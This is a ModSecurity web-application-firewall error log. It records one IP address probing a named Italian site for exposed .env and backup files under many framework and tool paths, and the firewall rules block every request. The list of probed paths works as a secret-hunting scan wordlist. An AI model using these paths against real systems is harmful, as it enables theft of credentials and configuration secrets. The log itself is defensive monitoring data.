[Thu Nov 27 01:04:48.886498 2025] [:error] [pid 350836] [client 195.178.110.157:37102] [client 195.178.110.157] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /docker/app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/docker/app/.env"] [unique_id "aSeVoKWtpwlEodVKjNruBQAAAAI"]
[Thu Nov 27 01:04:48.886747 2025] [:error] [pid 350836] [client 195.178.110.157:37102] [client 195.178.110.157] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/docker/app/.env"] [unique_id "aSeVoKWtpwlEodVKjNruBQAAAAI"]
[Thu Nov 27 01:04:48.886941 2025] [:error] [pid 350836] [client 195.178.110.157:37102] [client 195.178.110.157] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/docker/app/.env"] [unique_id "aSeVoKWtpwlEodVKjNruBQAAAAI"]
[Thu Nov 27 01:04:49.064859 2025] [:error] [pid 350836] [client 195.178.110.157:37102] [client 195.178.110.157] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.38121.it"] [uri "/env.backup"] [unique_id "aSeVoaWtpwlEodVKjNruBgAAAAI"]
[Thu Nov 27 01:04:49.065163 2025] [:error] [pid 350836] [client 195.178.110.157:37102] [client 195.178.110.157] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/env.backup"] [unique_id "aSeVoaWtpwlEodVKjNruBgAAAAI"]
[Thu Nov 27 01:04:49.065367 2025] [:error] [pid 350836] [client 195.178.110.157:37102] [client 195.178.110.157] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/env.backup"] [unique_id "aSeVoaWtpwlEodVKjNruBgAAAAI"]
[Thu Nov 27 01:05:08.202286 2025] [:error] [pid 351633] [client 195.178.110.157:37410] [client 195.178.110.157] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.vscode/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.vscode/.env"] [unique_id "aSeVtEXxoFA2gQuzslPZbwAAAAU"]
[Thu Nov 27 01:05:08.202549 2025] [:error] [pid 351633] [client 195.178.110.157:37410] [client 195.178.110.157] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.vscode/.env"] [unique_id "aSeVtEXxoFA2gQuzslPZbwAAAAU"]
[Thu Nov 27 01:05:08.202740 2025] [:error] [pid 351633] [client 195.178.110.157:37410] [client 195.178.110.157] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.vscode/.env"] [unique_id "aSeVtEXxoFA2gQuzslPZbwAAAAU"]
[Thu Nov 27 01:05:11.727201 2025] [:error] [pid 351633] [client 195.178.110.157:37410] [client 195.178.110.157] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /js/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/js/.env"] [unique_id "aSeVt0XxoFA2gQuzslPZcAAAAAU"]
[Thu Nov 27 01:05:11.727439 2025] [:error] [pid 351633] [client 195.178.110.157:37410] [client 195.178.110.157] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/js/.env"] [unique_id "aSeVt0XxoFA2gQuzslPZcAAAAAU"]
[Thu Nov 27 01:05:11.727627 2025] [:error] [pid 351633] [client 195.178.110.157:37410] [client 195.178.110.157] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/js/.env"] [unique_id "aSeVt0XxoFA2gQuzslPZcAAAAAU"]
[Thu Nov 27 01:05:13.611862 2025] [:error] [pid 350847] [client 195.178.110.157:37414] [client 195.178.110.157] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /laravel/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/laravel/.env"] [unique_id "aSeVuaFYQXAaYCyOv5ADegAAAAM"]
[Thu Nov 27 01:05:13.612101 2025] [:error] [pid 350847] [client 195.178.110.157:37414] [client 195.178.110.157] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/laravel/.env"] [unique_id "aSeVuaFYQXAaYCyOv5ADegAAAAM"]
[Thu Nov 27 01:05:13.612285 2025] [:error] [pid 350847] [client 195.178.110.157:37414] [client 195.178.110.157] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/laravel/.env"] [unique_id "aSeVuaFYQXAaYCyOv5ADegAAAAM"]
[Thu Nov 27 01:05:14.214783 2025] [:error] [pid 350847] [client 195.178.110.157:37414] [client 195.178.110.157] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /laravel/core/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/laravel/core/.env"] [unique_id "aSeVuqFYQXAaYCyOv5ADewAAAAM"]
[Thu Nov 27 01:05:14.215069 2025] [:error] [pid 350847] [client 195.178.110.157:37414] [client 195.178.110.157] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/laravel/core/.env"] [unique_id "aSeVuqFYQXAaYCyOv5ADewAAAAM"]
[Thu Nov 27 01:05:14.215265 2025] [:error] [pid 350847] [client 195.178.110.157:37414] [client 195.178.110.157] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/laravel/core/.env"] [unique_id "aSeVuqFYQXAaYCyOv5ADewAAAAM"]
[Thu Nov 27 01:05:14.787467 2025] [:error] [pid 350847] [client 195.178.110.157:37414] [client 195.178.110.157] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /mail/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/mail/.env"] [unique_id "aSeVuqFYQXAaYCyOv5ADfAAAAAM"]
[Thu Nov 27 01:05:14.787701 2025] [:error] [pid 350847] [client 195.178.110.157:37414] [client 195.178.110.157] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/mail/.env"] [unique_id "aSeVuqFYQXAaYCyOv5ADfAAAAAM"]
[Thu Nov 27 01:05:14.787906 2025] [:error] [pid 350847] [client 195.178.110.157:37414] [client 195.178.110.157] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/mail/.env"] [unique_id "aSeVuqFYQXAaYCyOv5ADfAAAAAM"]
[Thu Nov 27 01:05:15.191400 2025] [:error] [pid 350847] [client 195.178.110.157:37414] [client 195.178.110.157] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /mailer/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/mailer/.env"] [unique_id "aSeVu6FYQXAaYCyOv5ADfQAAAAM"]
[Thu Nov 27 01:05:15.191680 2025] [:error] [pid 350847] [client 195.178.110.157:37414] [client 195.178.110.157] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/mailer/.env"] [unique_id "aSeVu6FYQXAaYCyOv5ADfQAAAAM"]
[Thu Nov 27 01:05:15.191899 2025] [:error] [pid 350847] [client 195.178.110.157:37414] [client 195.178.110.157] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/mailer/.env"] [unique_id "aSeVu6FYQXAaYCyOv5ADfQAAAAM"]
[Thu Nov 27 01:05:15.609876 2025] [:error] [pid 350847] [client 195.178.110.157:37414] [client 195.178.110.157] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /nginx/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/nginx/.env"] [unique_id "aSeVu6FYQXAaYCyOv5ADfgAAAAM"]
[Thu Nov 27 01:05:15.610122 2025] [:error] [pid 350847] [client 195.178.110.157:37414] [client 195.178.110.157] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/nginx/.env"] [unique_id "aSeVu6FYQXAaYCyOv5ADfgAAAAM"]
[Thu Nov 27 01:05:15.610326 2025] [:error] [pid 350847] [client 195.178.110.157:37414] [client 195.178.110.157] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/nginx/.env"] [unique_id "aSeVu6FYQXAaYCyOv5ADfgAAAAM"]
[Thu Nov 27 01:05:16.160398 2025] [:error] [pid 350847] [client 195.178.110.157:37414] [client 195.178.110.157] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /public/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/public/.env"] [unique_id "aSeVvKFYQXAaYCyOv5ADfwAAAAM"]
[Thu Nov 27 01:05:16.160738 2025] [:error] [pid 350847] [client 195.178.110.157:37414] [client 195.178.110.157] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/public/.env"] [unique_id "aSeVvKFYQXAaYCyOv5ADfwAAAAM"]
[Thu Nov 27 01:05:16.160999 2025] [:error] [pid 350847] [client 195.178.110.157:37414] [client 195.178.110.157] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/public/.env"] [unique_id "aSeVvKFYQXAaYCyOv5ADfwAAAAM"]
[Thu Nov 27 01:05:16.848422 2025] [:error] [pid 350847] [client 195.178.110.157:37414] [client 195.178.110.157] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /site/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/site/.env"] [unique_id "aSeVvKFYQXAaYCyOv5ADgAAAAAM"]
[Thu Nov 27 01:05:16.848779 2025] [:error] [pid 350847] [client 195.178.110.157:37414] [client 195.178.110.157] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/site/.env"] [unique_id "aSeVvKFYQXAaYCyOv5ADgAAAAAM"]
[Thu Nov 27 01:05:16.849040 2025] [:error] [pid 350847] [client 195.178.110.157:37414] [client 195.178.110.157] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/site/.env"] [unique_id "aSeVvKFYQXAaYCyOv5ADgAAAAAM"]
[Thu Nov 27 01:05:17.459236 2025] [:error] [pid 350847] [client 195.178.110.157:37414] [client 195.178.110.157] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /xampp/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/xampp/.env"] [unique_id "aSeVvaFYQXAaYCyOv5ADgQAAAAM"]
[Thu Nov 27 01:05:17.459468 2025] [:error] [pid 350847] [client 195.178.110.157:37414] [client 195.178.110.157] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/xampp/.env"] [unique_id "aSeVvaFYQXAaYCyOv5ADgQAAAAM"]
[Thu Nov 27 01:05:17.459681 2025] [:error] [pid 350847] [client 195.178.110.157:37414] [client 195.178.110.157] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/xampp/.env"] [unique_id "aSeVvaFYQXAaYCyOv5ADgQAAAAM"]
[Thu Nov 27 01:05:18.202623 2025] [:error] [pid 350847] [client 195.178.110.157:37414] [client 195.178.110.157] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /main/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/main/.env"] [unique_id "aSeVvqFYQXAaYCyOv5ADggAAAAM"]
[Thu Nov 27 01:05:18.202869 2025] [:error] [pid 350847] [client 195.178.110.157:37414] [client 195.178.110.157] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/main/.env"] [unique_id "aSeVvqFYQXAaYCyOv5ADggAAAAM"]
[Thu Nov 27 01:05:18.203068 2025] [:error] [pid 350847] [client 195.178.110.157:37414] [client 195.178.110.157] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/main/.env"] [unique_id "aSeVvqFYQXAaYCyOv5ADggAAAAM"]
[Thu Nov 27 01:05:19.015915 2025] [:error] [pid 350847] [client 195.178.110.157:37414] [client 195.178.110.157] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /node_modules/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/node_modules/.env"] [unique_id "aSeVv6FYQXAaYCyOv5ADgwAAAAM"]
